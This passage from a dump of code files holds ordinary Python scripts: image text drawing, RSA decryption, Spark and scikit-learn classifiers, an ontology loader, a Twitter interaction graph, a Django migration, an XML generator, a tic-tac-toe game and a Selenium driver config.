top point of the text.\n text: str\n Text to draw.\n size: int\n Text size in pixel.\n color: (3,) array-like\n Text RGB color in uint8.\n Default is (0, 0, 0), which is black.\n\n Returns\n -------\n dst: numpy.ndarray\n Output image.\n '''\n src_pil = PIL.Image.fromarray(src)\n draw = PIL.ImageDraw.ImageDraw(src_pil)\n\n y1, x1 = yx\n color = tuple(color)\n font = _get_font(size=size)\n draw.text(xy=(x1, y1), text=text, fill=color, font=font)\n\n dst = np.asarray(src_pil)\n return dst\n\n\ndef text_in_rectangle(src, loc, text, size, background, color=(0, 0, 0)):\n '''Draw text in a rectangle.\n\n Parameters\n ----------\n src: numpy.ndarray\n Input image.\n loc: str\n Location of text. It must be one of following: lt, rt, lb, or rb.\n text: str\n Text to draw.\n size: int\n Text size in pixel.\n background: (3,) array-like\n Background color in uint8.\n color: (3,) array-like\n Text RGB color in uint8.\n Default is (0, 0, 0), which is black.\n\n Returns\n -------\n dst: numpy.ndarray\n Output image.\n '''\n\n tsize = text_size(text, size)\n\n height, width = src.shape[:2]\n if loc == 'lt':\n yx = (0, 0)\n elif loc == 'rt':\n yx = (0, (width - 1) - tsize[1] - 1)\n elif loc == 'lb':\n yx = ((height - 1) - tsize[0] - 1, 0)\n elif loc == 'rb':\n yx = ((height - 1) - tsize[0] - 1, (width - 1) - tsize[1] - 1)\n else:\n raise ValueError('unsupported loc: {}'.format(loc))\n\n dst = rectangle(\n src=src,\n aabb1=(yx[0], yx[1]),\n aabb2=(yx[0] + tsize[0] + 1, yx[1] + tsize[1] + 1),\n color=background,\n fill=background,\n )\n dst = globals()['text'](\n src=dst,\n yx=(yx[0] + 1, yx[1] + 1),\n text=text,\n color=color,\n size=size,\n )\n return dst\n","sub_path":"imgviz/draw.py","file_name":"draw.py","file_ext":"py","file_size_in_byte":3765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"514906520","text":"import rsa\nimport binascii\nwith open('Private.pem',mode='rb') as privatefile:\n keydata=privatefile.read()\nprint(keydata)\nprikey=rsa.PrivateKey.load_pkcs1(keydata)\n\nprint(prikey)\nmimi=('D6HtGLK8/HWpHCEGrYrJ6j2OYZO7GbCeFWsuMZU510RrNop9EAvwcaE8BgaxvJGL2wkmYDdPK+vCFKfDg3pDQYaJC5HBDwI4'\n 'Pg6Y52d+3BC+b8f4Cm/'\n 'URZ4Ygm11nWAN73w6s679EFKt4XKRooE8r5X4UtfL+dV/FxEXoGOZ5qA=')\nprint(binascii.a2b_base64(mimi))\nmessage=rsa.decrypt(binascii.a2b_base64(mimi),prikey)\nprint(str(message,encoding='UTF-8'))\nprint(str(message,encoding='UTF-8')=='This is a test!')","sub_path":"Flask+Gevent/rsaPorject.py","file_name":"rsaPorject.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"111036218","text":"from pyspark.ml import Pipeline\nfrom pyspark.ml.classification import RandomForestClassifier\nfrom pyspark.ml.evaluation import BinaryClassificationEvaluator\nfrom pyspark.ml.feature import *\nfrom pyspark.ml.tuning import ParamGridBuilder, CrossValidator\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.functions import *\n\n\ndef main():\n spark = SparkSession.builder.master(\"local[2]\").getOrCreate()\n df = spark.read.option(\"header\", \"true\").option(\"inferSchema\", \"true\").csv(\"data/train.csv\"). \\\n withColumnRenamed(\"Survived\", \"label\")\n avg_age = df.agg(mean(\"Age\").alias(\"avg\")).collect()[0][\"avg\"]\n na_map = {\"Age\": avg_age, \"Sex\": \"male\", \"Embarked\": \"S\", \"Fare\": 0.0, \"SibSp\": 0.0}\n df = df.na.fill(na_map)\n sex_indexer = StringIndexer().setInputCol(value=\"Sex\").setOutputCol(\"sex_index\")\n embarked_indexer = StringIndexer().setInputCol(\"Embarked\").setOutputCol(\"embarked_index\")\n vector_assembler = VectorAssembler().setInputCols([\"sex_index\", \"embarked_index\", \"Fare\", \"SibSp\", \"Age\"]). \\\n setOutputCol(\"features\")\n classifier = RandomForestClassifier().setFeaturesCol(\"features\")\n\n pipeline = Pipeline().setStages([sex_indexer, embarked_indexer, vector_assembler, classifier])\n\n grid = ParamGridBuilder().addGrid(classifier.maxDepth, [5, 8]). \\\n addGrid(classifier.maxBins, [16, 32]).build()\n\n crossval = CrossValidator(estimator=pipeline,\n estimatorParamMaps=grid,\n evaluator=BinaryClassificationEvaluator(),\n numFolds=3)\n\n cv_model = crossval.fit(df)\n\n test_df = spark.read.option(\"header\", \"true\").option(\"inferSchema\", \"true\").csv(\"data/test.csv\").fillna(na_map)\n cv_model.transform(test_df). \\\n select(\"PassengerId\", \"prediction\"). \\\n show()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"spark_ml/spark_ml_demo.py","file_name":"spark_ml_demo.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"300874582","text":"#!/usr/bin/python\n'''\n -------------------------------\n Script Name : ipush_test.py\n Usage : testing ipush by cloning lsv branch\n Modules Used : os,commands,subprocess\n Developer : Trupti\n Version :\n Created On : 05-04-2015\n Modified On :\n Update : updated for both SJ hub and GOT hub\n\tLog file : ipush_output.txt log will be stored in current directory\n -----------------------------------\n'''\nimport sys\nimport os\nimport commands\nimport subprocess\n\nxid = commands.getoutput('whoami')\npath = os.getcwd()\nlog_file = path + '/ipush_output.txt'\nif os.path.isfile(log_file):\n\tos.system('rm -rf '+log_file)\nscratch_space_sj = commands.getoutput('ls -d /scratch/[0-9][0-9][0-9]/'+xid)\nscratch_sj =scratch_space_sj.split(\"\\n\")[0]\n\ndir_name = str(raw_input(\"Enter a directory name to be created..\"))\nscratch_space_got= '/workspace/scratch/'+xid\n\nif os.path.exists(dir_name):\n os.system('rm -rf '+ dir_name)\nos.mkdir(dir_name)\n\nos.chdir(dir_name)\ncmd = \"/tools/swdev/bin/authclone ipos -b lsv 2>&1|tee -a \" + log_file\n#os.system(cmd)\n\nos.chdir('ipos')\nwith open('pkt/sw/se/xc/bsd/routing/ipmulticast/pim/src/pim_mcastmgr_ipc.c','a') as fp:\n fp.write('/*----------------------*/')\nos.system('git add pkt/sw/se/xc/bsd/routing/ipmulticast/pim/src/pim_mcastmgr_ipc.c')\nos.system('git commit -m \"Bug ids: 235336\\nReviewers: eanknem ejiawen\\nTargets Built: ASG\\nUnit Test Suites run: none\\nAffected Modules: none\\nDummy commit message.\"')\n\nif os.path.exists(scratch_space_got):\n\tif os.path.exists(scratch_space_got+'/'+dir_name):\n\t\tos.system('rm -rf ' +scratch_space_got+'/'+dir_name)\n\telse: \n\t\tos.system('scratch-config '+ scratch_space_got+'/'+ dir_name +'/')\nelif os.path.exists(scratch_sj):\n\tif os.path.exists(scratch_sj+'/'+dir_name):\n\t\tos.system('rm -rf ' +scratch_sj+'/'+dir_name)\n\telse:\n\t os.system('export PATH=/tools/swdev/bin:$PATH')\n\t os.system('scratch-config '+ scratch_sj+'/'+dir_name+'/')\n#os.system('git ipush 2>&1|tee -a '+ log_file)\n\n","sub_path":"work/iPush/demo_ipush_test.py","file_name":"demo_ipush_test.py","file_ext":"py","file_size_in_byte":2018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"224271950","text":"import numpy as np\nimport pandas as pd\n\nfrom time import time\nfrom functools import wraps\nfrom collections import Counter\n\nfrom sklearn import svm\nfrom sklearn.model_selection import train_test_split\n\n\n###\n\n\ndef print_duration(start, end):\n ''' Display the duration of an execution in the format -> 00:00:00.00\n ----------\n PARAMETERS\n - start, end: time.time() object representing CPU time at a certain moment\n ----------\n RETURNS\n - None\n\n '''\n hours, rem = divmod(end - start, 3600)\n minutes, seconds = divmod(rem, 60)\n print(\"{:0>2}:{:0>2}:{:05.2f}\\n\".format(int(hours), int(minutes), seconds))\n\n\ndef timing(f):\n ''' Decorator used to claculate the time used to compute a function\n ----------\n PARAMETERS\n - f: executable function\n ----------\n RETURNS\n - returns a wrapper for time calculation for the function f\n\n '''\n @wraps(f)\n def wrapper(*args, **kwargs):\n start = time()\n result = f(*args, **kwargs)\n end = time()\n # Display the elapsed time in pretty format -> 00:00:00.00\n print(f\"Elapsed time for {f.__name__}(): \", end = \"\")\n print_duration(start, end)\n\n return result\n\n return wrapper\n\n\n@timing\ndef read_data(data_path):\n ''' Read a .csv file from the specified path\n ----------\n PARAMETERS\n - data_path: string with the name of the file to be read\n\n (notice that data_path only contains the name of the file, and thus the file\n must be located in the same directory as this 'histogram_svm.py' script)\n ----------\n RETURNS\n - a pd.DataFrame with the representation of the data\n\n '''\n # Specify dtypes and column names\n length = int(data_path.split('.')[0][2:])**2\n dtypes = {'pixel-' + str(i): 'uint8' for i in range(1, length +1)}\n dtypes.update({'label' : 'category'})\n colnames = list(dtypes.keys())\n\n print('-' * 60)\n print(f\"Reading {data_path}...\")\n data = pd.read_csv(\n data_path, header = None, names = colnames, dtype = dtypes\n )\n # Output some metrics of the data file\n print(f\"train.cv file has {data.shape[0]} rows and {data.shape[1]} columns\")\n print(f\"Memory usage: {round(data.memory_usage().sum() / 1024**2, 3)} Mb\")\n print('-' * 60)\n \n return data\n\n\n###\n\n\nif __name__ == '__main__':\n\n print(f'Radial-basis kernel SVM for the 64x64 lego pieces dataset:')\n\n df = read_data('df64.csv')\n # Split the target (label) from data\n Y = np.array(df.label)\n df = df.drop(columns = ['label'])\n\n # Convert data to a numpy ndarray\n X = np.array(df).astype('uint8')\n\n # Train and test splitting\n x_train, x_test, y_train, y_test = train_test_split(\n X, Y, shuffle = True, stratify = Y, train_size = .5,\n test_size = .2, random_state = 347\n )\n\n ###\n # Fit the SVM\n ###\n\n # Initialize an instance of a histogram-kernel SVM with specified L\n cvf = svm.SVC(kernel = 'rbf', gamma = 'scale')\n\n print('-' * 60)\n\n print('Fitting the SVM with training data...')\n start = time()\n # Train the SVM with the training samples\n cvf.fit(x_train, y_train)\n end = time()\n print('Elapsed time for training the SVM: ', end = '')\n print_duration(start, end)\n\n \n print('Predicting test values...')\n start = time()\n # Predict on the test set\n test_predictions = cvf.predict(x_test)\n end = time()\n print('Elapsed time for predicting on test data: ', end = '')\n print_duration(start, end)\n\n print()\n print('-' * 60)\n # Output the accuracy on the test set\n print(f\"Test accuracy: {sum(test_predictions == y_test) / len(y_test)}\")\n\n\n\n","sub_path":"radial_svm.py","file_name":"radial_svm.py","file_ext":"py","file_size_in_byte":3639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"607183163","text":"# -*- coding: utf-8 -*-\n\"\"\"\n.. See the NOTICE file distributed with this work for additional information\n regarding copyright ownership.\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n http://www.apache.org/licenses/LICENSE-2.0\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\"\"\"\n\nimport logging\n\nfrom bio.ensembl.ontology.hive.OLSHiveLoader import OLSHiveLoader\nfrom bio.ensembl.ontology.loader.db import dal\nfrom bio.ensembl.ontology.loader.models import Ontology, Term, Relation, RelationType, get_one_or_create\n\nlogger = logging.getLogger(__name__)\n\n\nclass OLSLoadPhiBaseIdentifier(OLSHiveLoader):\n\n def run(self):\n self.input_job.transient_error = False\n logger.info('Loading PHIBASe Identifier terms')\n with dal.session_scope() as session:\n # delete phi-base-identifier namespaces ontology\n if self.param_required('_start_term_index') == 0:\n # only delete for first chunk\n ontologies = session.query(Ontology).filter_by(name='phi', namespace='phibase_identifier').all()\n for ontology in ontologies:\n logger.info('Deleting namespaced ontology %s - %s', ontology.name, ontology.namespace)\n rel = session.query(Relation).filter_by(ontology=ontology).delete()\n logger.info('Wiped %s Relations', rel)\n res = session.query(Term).filter_by(ontology=ontology).delete()\n logger.info('Wiped %s Terms', res)\n logger.debug('...Done')\n m_ontology, created = get_one_or_create(Ontology, session,\n name='phi',\n namespace='phibase_identifier',\n create_method_kwargs=dict(\n version='1.0',\n title='PHI-base Identifiers')\n )\n relation_type, created = get_one_or_create(RelationType,\n session,\n name='is_a')\n for i in range(self.param_required('_start_term_index'), self.param_required('_end_term_index') + 1):\n accession = 'PHI:{}'.format(i)\n term = Term(accession=accession, name='{}'.format(i))\n if i == 0:\n term.name = 'phibase identifier'\n term.is_root = 1\n m_related = term\n else:\n m_related = session.query(Term).filter_by(accession='PHI:0').one()\n logger.debug('Adding Term %s', accession)\n session.add(term)\n m_ontology.terms.append(term)\n if i != 0:\n term.add_parent_relation(m_related, relation_type, session)\n else:\n m_related = term\n if i % 100 == 0:\n logger.info('Committing transaction')\n session.commit()\n\n def write_output(self):\n logger.info('Ontology %s done...', self.param_required('ontology_name'))\n","sub_path":"bio/ensembl/ontology/hive/OLSLoadPhiBaseIdentifier.py","file_name":"OLSLoadPhiBaseIdentifier.py","file_ext":"py","file_size_in_byte":3691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"262130553","text":"import pandas as pd\nimport numpy as np\nfrom scipy import stats\nfrom operator import itemgetter\nimport re\nimport json\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport networkx as nx\nimport pymongo\n\nfrom wordcloud import WordCloud\n\nclient = pymongo.MongoClient('localhost', 27017)\ndb = client.TwitterStream\ntweets = db.all_tweets\n\n\n# Get the information about user\ndef get_users(tweets_final):\n print(\"Getting users...\")\n tweets_final[\"screen_name\"] = tweets_df['user.screen_name']\n tweets_final[\"user_id\"] = tweets_df[\"user.id\"]\n tweets_final[\"followers_count\"] = tweets_df[\"user.followers_count\"]\n return tweets_final\n\n\n# Get the user mentions\ndef get_usermentions(tweets_final):\n print(\"Getting User Mentions...\")\n # Inside the tag 'entities' will find 'user mentions' and will get 'screen name' and 'id'\n if not tweets_df['entities.user_mentions'].empty:\n tweets_final[\"user_mentions_screen_name\"] = tweets_df['entities.user_mentions'][0][0]['screen_name']\n tweets_final[\"user_mentions_id\"] = tweets_df['entities.user_mentions'][0][0][\"id_str\"]\n return tweets_final\n\n\n# Get retweets\ndef get_retweets(tweets_final):\n print(\"Getting Retweets...\")\n # Inside the tag 'retweeted_status' will find 'user' and will get 'screen name' and 'id'\n tweets_final[\"retweeted_screen_name\"] = tweets_df[\"retweeted_status.user.screen_name\"]\n tweets_final[\"retweeted_id\"] = tweets_df[\"retweeted_status.user.id_str\"]\n return tweets_final\n\n\n# Get quoted tweets\ndef get_quoted(tweets_final):\n print(\"Getting Quoted Tweets...\")\n # Inside the tag 'retweeted_status' will find 'user' and will get 'screen name' and 'id'\n tweets_final[\"quoted_screen_name\"] = tweets_df[\"quoted_status.user.screen_name\"]\n tweets_final[\"quoted_id\"] = tweets_df[\"quoted_status.user.id_str\"]\n return tweets_final\n\n\n# Get the interactions between the different users\ndef get_interactions(row):\n # From every row of the original dataframe\n # First we obtain the 'user_id' and 'screen_name'\n user = row[\"user_id\"], row[\"screen_name\"]\n # Be careful if there is no user id\n if user[0] is None:\n return (None, None), []\n\n # The interactions are going to be a set of tuples\n interactions = set()\n\n # Add Mentions\n interactions.add((row[\"user_mentions_id\"], row[\"user_mentions_screen_name\"]))\n # Add Retweets\n interactions.add((row[\"retweeted_id\"], row[\"retweeted_screen_name\"]))\n # Add replies\n interactions.add((row[\"in_reply_to_user_id\"], row[\"in_reply_to_screen_name\"]))\n # Add quotes\n interactions.add((row[\"quoted_id\"], row[\"quoted_screen_name\"]))\n\n # Discard if user id is in interactions\n interactions.discard((row[\"user_id\"], row[\"screen_name\"]))\n # Discard all not existing values\n interactions.discard((None, None))\n # Return user and interactions\n return user, interactions\n\n\n# Get the information about replies\ndef get_reply(tweets_final):\n # Just copy the 'in_reply' columns to the new dataframe\n tweets_final[\"in_reply_to_screen_name\"] = tweets_df[\"in_reply_to_screen_name\"]\n tweets_final[\"in_reply_to_status_id\"] = tweets_df[\"in_reply_to_status_id\"]\n tweets_final[\"in_reply_to_user_id\"] = tweets_df[\"in_reply_to_user_id\"]\n return tweets_final\n\n\n# Lastly fill the new dataframe with the important information\ndef fill_df(tweets_final):\n tweets_final = get_users(tweets_final)\n tweets_final = get_usermentions(tweets_final)\n tweets_final = get_retweets(tweets_final)\n tweets_final = get_reply(tweets_final)\n tweets_final = get_quoted(tweets_final)\n return tweets_final\n\n\n\n\nif __name__ == \"__main__\":\n pd.set_option('display.float_format', lambda x: '%.f' % x)\n print(\"Getting Database And Flattening...\")\n tweets_df = pd.json_normalize(tweets.find({}).limit(500), max_level=2)\n\n print(list(tweets_df.columns))\n # Create a second dataframe to put important information\n tweets_final = pd.DataFrame(\n columns=[\"created_at\", \"id\", \"in_reply_to_screen_name\", \"in_reply_to_status_id\", \"in_reply_to_user_id\",\n \"retweeted_id\", \"retweeted_screen_name\", \"user_mentions_screen_name\", \"user_mentions_id\",\n \"text\", \"user_id\", \"screen_name\", \"followers_count\"])\n\n # Columns that are going to be the same\n equal_columns = [\"created_at\", \"id\", \"text\"]\n tweets_final[equal_columns] = tweets_df[equal_columns]\n\n tweets_final = fill_df(tweets_final)\n\n tweets_final = tweets_final.where((pd.notnull(tweets_final)), None)\n\n graph = nx.Graph()\n\n print(\"Getting Interactions....\")\n\n for index, tweet in tweets_final.iterrows():\n user, interactions = get_interactions(tweet)\n user_id, user_name = user\n tweet_id = tweet[\"id\"]\n # tweet_sent = tweet[\"sentiment\"]\n for interaction in interactions:\n int_id, int_name = interaction\n\n graph.add_edge(user_id, int_id, tweet_id=tweet_id)\n\n graph.nodes()[user_id][\"name\"] = user_name\n graph.nodes()[int_id][\"name\"] = int_name\n\n print(\"Graph Data...\")\n\n print(f\"There are {graph.number_of_nodes()} nodes and {graph.number_of_edges()} edges present in the Graph\")\n\n degrees = [val for (node, val) in graph.degree()]\n print(f\"The maximum degree of the Graph is {np.max(degrees)}\")\n print(f\"The minimum degree of the Graph is {np.min(degrees)}\")\n print(f\"The average degree of the nodes in the Graph is {np.mean(degrees):.1f}\")\n print(f\"The most frequent degree of the nodes found in the Graph is {stats.mode(degrees)[0][0]}\")\n\n if nx.is_connected(graph):\n print(\"The graph is connected\")\n else:\n print(\"The graph is not connected\")\n\n print(f\"There are {nx.number_connected_components(graph)} connected components in the Graph\")\n\n print(\"Drawing Graph...\")\n pos = nx.spring_layout(graph, k=0.15)\n plt.figure()\n nx.draw(graph, pos=pos, edge_color=\"black\", linewidths=0.05,\n node_size=4, alpha=0.6, with_labels=False)\n nx.draw_networkx_nodes(graph, pos=pos, node_size=5, node_color=range(graph.number_of_nodes()), cmap='Blues')\n plt.savefig('all_Interactions.png')\n plt.show()\n","sub_path":"interactions.py","file_name":"interactions.py","file_ext":"py","file_size_in_byte":6172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"181477257","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('events', '0002_auto_20151007_1523'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='rhizomeevent',\n options={'verbose_name': 'Rhizome Event', 'verbose_name_plural': 'Rhizome Events'},\n ),\n migrations.AddField(\n model_name='rhizomeevent',\n name='curator_other',\n field=models.TextField(help_text='If no rhizome user or cannot create user account, like for an organization.', max_length=200, null=True, verbose_name='Other Curator', blank=True),\n ),\n migrations.AddField(\n model_name='rhizomeevent',\n name='curator_other_link',\n field=models.URLField(null=True, blank=True),\n ),\n migrations.AddField(\n model_name='rhizomeevent',\n name='tickets_link',\n field=models.URLField(null=True, blank=True),\n ),\n migrations.RemoveField(\n model_name='rhizomeevent',\n name='curator',\n ),\n migrations.AddField(\n model_name='rhizomeevent',\n name='curator',\n field=models.ManyToManyField(related_name='event_curator', null=True, to=settings.AUTH_USER_MODEL, blank=True),\n ),\n ]\n","sub_path":"rhizome/events/migrations/0003_auto_20151007_1535.py","file_name":"0003_auto_20151007_1535.py","file_ext":"py","file_size_in_byte":1520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"424029636","text":"'''\n三数之和\n'''\n\n\nclass Solution(object):\n def threeSum(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[List[int]]\n \"\"\"\n sortnums = nums.sort()\n return sortnums\n\nif __name__ == '__main__':\n nums = [1, 2, -1, -3, 0]\n print(nums)\n solu = Solution()\n s = solu.threeSum(nums)\n # solu = Solution.threeSum(nums)\n print(s)\n print(nums)","sub_path":"Day01/SumThreeNumber.py","file_name":"SumThreeNumber.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"138101456","text":"import json\nimport requests\nfrom datetime import datetime\n\ncurrency = 'INR'\n\nglobal_url='https://api.coinmarketcap.com/v2/global/?convert=' + currency\n\nrequest = requests.get(global_url)\nresults = request.json()\n\nprint(json.dumps(results,sort_keys=True,indent=4))\n\n\nactive_currencies = results['data']['active_cryptocurrencies']\nactive_markets = results['data']['active_markets']\nbitcoin_percentage = results['data']['bitcoin_percentage_of_market_cap']\nlast_updated = results['data']['last_updated']\nglobal_cap = int(results['data']['quotes'][currency]['total_market_cap'])\nglobal_volume = int(results['data']['quotes'][currency]['total_volume_24h'])\n\n\nactive_currencies_string='{:,}'.format(active_currencies)\nactive_markets_strings = '{:,}'.format(active_markets)\nglobal_cap_strings = '{:,}'.format(global_cap)\nglobal_volume_strings = '{:,}'.format(global_volume)\nlast_updated_strings = datetime.fromtimestamp(last_updated).strftime('%B %d,%Y at %I:%M%p')\n\nprint()\nprint('there are currently ' +str(active_currencies_string) +'active_cryptocurrencies and' +str(active_markets_strings)+ 'active_markets')\nprint('global cap of all crypto is ' + str(global_cap_strings) + ' and 24h global vloume is' +str(global_volume_strings)+ '.')\nprint('Bitcoin\\'s total percentage of global cap is ' +str(bitcoin_percentage)+ '%.')\nprint('last updated on' +str(last_updated_strings)+ '.')\n","sub_path":"coincap_global.py","file_name":"coincap_global.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"467490270","text":"#coding:utf-8\n\n'''\nCreated on 2016-1-1\n\n@author: ZWD\n@description: xml generator\n'''\n\n#导入xml模块\nimport xml.dom.minidom as Dom\nimport os\n\nclass XMLGenerator:\n #创建xml文件对象,初始化文件名\n def __init__(self, xml_name):\n self.doc = Dom.Document()\n self.xml_name = xml_name\n\n #创建节点\n def createNode(self, node_name):\n return self.doc.createElement(node_name)\n\n #添加节点\n def addNode(self, node, prev_node=None):\n cur_node = node\n if prev_node is not None:\n prev_node.appendChild(cur_node)\n else:\n self.doc.appendChild(cur_node)\n return cur_node\n\n #设置节点属性\n def setNodeAttr(self, node, att_name, value):\n cur_node = node\n cur_node.setAttribute(att_name, value)\n\n #设置节点值\n def setNodeValue(self, cur_node, value):\n node_data = self.doc.createTextNode(value)\n cur_node.appendChild(node_data)\n\n #生成xml文件\n def generateXml(self):\n myFile = open(self.xml_name, \"w\")\n myFile.write(self.doc.toprettyxml(indent=\"\\t\", newl=\"\\n\", encoding=\"utf-8\"))\n myFile.close()\n\nif __name__ == \"__main__\":\n xmlFile = XMLGenerator(\"config.xml\")\n\n node_config = xmlFile.createNode(\"config\")\n xmlFile.setNodeAttr(node_config, \"author\", \"ZWD\")\n xmlFile.setNodeAttr(node_config, \"date\", \"2016-1-1\")\n xmlFile.addNode(node=node_config)\n\n #node_file块开始\n node_file = xmlFile.createNode(\"file\")\n\n node_file_path = xmlFile.createNode(\"path\")\n xmlFile.setNodeValue(node_file_path,r\"d:\\file\")\n xmlFile.addNode(node_file_path, node_file)\n\n node_file_name = xmlFile.createNode(\"name\")\n xmlFile.setNodeValue(node_file_name, u\"2015-1210-1.xls\")\n xmlFile.addNode(node_file_name, node_file)\n\n xmlFile.addNode(node_file, node_config)\n #node_file块结束\n\n sheets = [('toolatr',), 'code', 'name', 'content', ('dropatr',), 'id', 'group', 'toolcode']\n temp_node = None\n for sheet in sheets:\n if type(sheet) == tuple:\n sheet_node = xmlFile.createNode(sheet[0])\n temp_node = sheet_node\n xmlFile.addNode(sheet_node, node_config)\n else:\n column_node = xmlFile.createNode(sheet)\n xmlFile.setNodeValue(column_node, '0')\n if temp_node != None:\n xmlFile.addNode(column_node, temp_node)\n else:\n print(\"没有找到表名!\")\n os._exit(1)\n\n xmlFile.generateXml()\n\n","sub_path":"XMLGenerator.py","file_name":"XMLGenerator.py","file_ext":"py","file_size_in_byte":2522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"280582117","text":"\n\nclass TicTacToe:\n\n TURN_TO_SYMBOL = ('X', 'O')\n\n def __init__(self, size) -> None:\n self.size = size\n self.pieces_remaining = self.size ** 2\n self.board = [['-' for _ in range(size)] for _ in range(size)]\n self.turn = 0 ## 0 for X, 1 for O, this way is easier to toggle\n \n def __str__(self):\n return '\\n---BOARD---\\n' + '\\n'.join(\n ' | '.join(self.board[row]) for row in range(len(self.board))\n )\n \n def place_piece(self, row, col, symbol):\n if (not 0 <= row < self.size\n or not 0 <= col < self.size):\n return False \n if not symbol:\n return False\n if self.board[row][col] != '-':\n return False\n self.board[row][col] = symbol\n self.pieces_remaining -= 1\n return True\n \n def play(self, play_computer = False):\n while self.pieces_remaining > 0:\n print(self)\n if play_computer and self.turn == 1:\n self.computer_play()\n else:\n row, col = self.get_user_input()\n while not self.place_piece(row, col, self.get_current_symbol()):\n print(f'failed to place {self.get_current_symbol()} at {row}, {col}, please try again')\n row, col = self.get_user_input()\n \n if self.win_check(self.get_current_symbol()):\n print(f'player {self.turn} has won!')\n break\n self.turn ^= 1\n\n def computer_play(self):\n for row in range(len(self.board)):\n for col in range(len(self.board[0])):\n if self.board[row][col] == '-':\n print(f'\\nAI MOVES TO {row},{col}')\n self.place_piece(row, col, self.get_current_symbol())\n return\n\n\n def get_current_symbol(self):\n return TicTacToe.TURN_TO_SYMBOL[self.turn]\n\n def get_user_input(self):\n print('')\n player_input = input(f'Player {self.turn} enter position to place {self.get_current_symbol()}: ')\n [row, col] = player_input.split()\n return (int(row), int(col))\n \n def win_check(self, symbol):\n row_win = self.win_check_rows(symbol)\n col_win = self.win_check_cols(symbol)\n diagonal_win = self.win_check_diagonals(symbol)\n return any([row_win, col_win, diagonal_win])\n \n def win_check_diagonals(self, symbol):\n n = self.size\n left_to_right = [self.board[i][i] for i in range(n)]\n right_to_left = [self.board[i][-1 - i] for i in range(n)]\n return self.win_check_arrays(symbol, [left_to_right, right_to_left])\n \n def win_check_rows(self, symbol):\n return self.win_check_arrays(symbol, self.board)\n\n def win_check_cols(self, symbol):\n cols_to_rows = zip(*self.board)\n return self.win_check_arrays(symbol, cols_to_rows)\n \n def win_check_arrays(self, symbol, arrays):\n for array in arrays:\n win = all(x == symbol for x in array)\n if win:\n return True\n return False\n\ngame = TicTacToe(3)\ngame.play(play_computer=True)\n\ndef test_row():\n game = TicTacToe(3)\n game.place_piece(0,0,'X')\n game.place_piece(0,1,'X')\n game.place_piece(0,2,'X')\n print(game)\n print(game.win_check('X'))\n\ndef test_diag():\n game = TicTacToe(3)\n game.place_piece(0,2, 'X')\n game.place_piece(1,1, 'X')\n print(game)\n print(game.win_check('X'))\n game.place_piece(2,0, 'X')\n print(game)\n print(game.win_check('X'))\n","sub_path":"leetcode/tic_tac_toe.py","file_name":"tic_tac_toe.py","file_ext":"py","file_size_in_byte":3569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"121599839","text":"import platform\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom selenium.webdriver.edge.options import Options\r\nfrom selenium.webdriver.firefox.options import Options\r\nfrom selenium.webdriver.opera.options import Options\r\nfrom webdriver_manager.chrome import ChromeDriverManager\r\nfrom webdriver_manager.firefox import GeckoDriverManager\r\nfrom webdriver_manager.microsoft import EdgeChromiumDriverManager\r\nfrom webdriver_manager.opera import OperaDriverManager\r\n\r\n\r\nclass configDriver:\r\n\r\n @staticmethod\r\n def get_webdriver(browser, config, headless_browser, page_load_strategy):\r\n \"\"\"\r\n :configDriver Returns a webdriver object of the particular browser to be executed from a STRING received as\r\n arguments during launch. If the headless_browser parameter has\r\n the value 'headless' then it sends a series of parameters from the config data to assign the\r\n assign the browser to headless browser mode.\r\n :param browser: main launch argument string, it indicates which browser to run.\r\n :param config: json file read buffer\r\n :param headless_browser: Its 'headless' value sends a series of parameters based on the data from the\r\n config data to assign the browser to headless browser mode.\r\n :param page_load_strategy:\r\n :returns Objeto webdriver\r\n \"\"\"\r\n # Obtenemos el nombre del sistema para retornar webdrivers de windows o linux\r\n\r\n if browser == 'chrome' or browser == 'default':\r\n\r\n if headless_browser == 'headless':\r\n\r\n user_agent = config[\"HEADLESS_ARGUMENTS\"][\"user_agent\"]\r\n chromeoptions = webdriver.ChromeOptions()\r\n chromeoptions.add_argument(\"--headless\")\r\n chromeoptions.add_argument(f'user-agent={user_agent}')\r\n # annadimos todos los argumentos para ejecutar en modo headless browser con seguridad\r\n chromeoptions.add_argument(config[\"HEADLESS_ARGUMENTS\"][\"window-size\"])\r\n 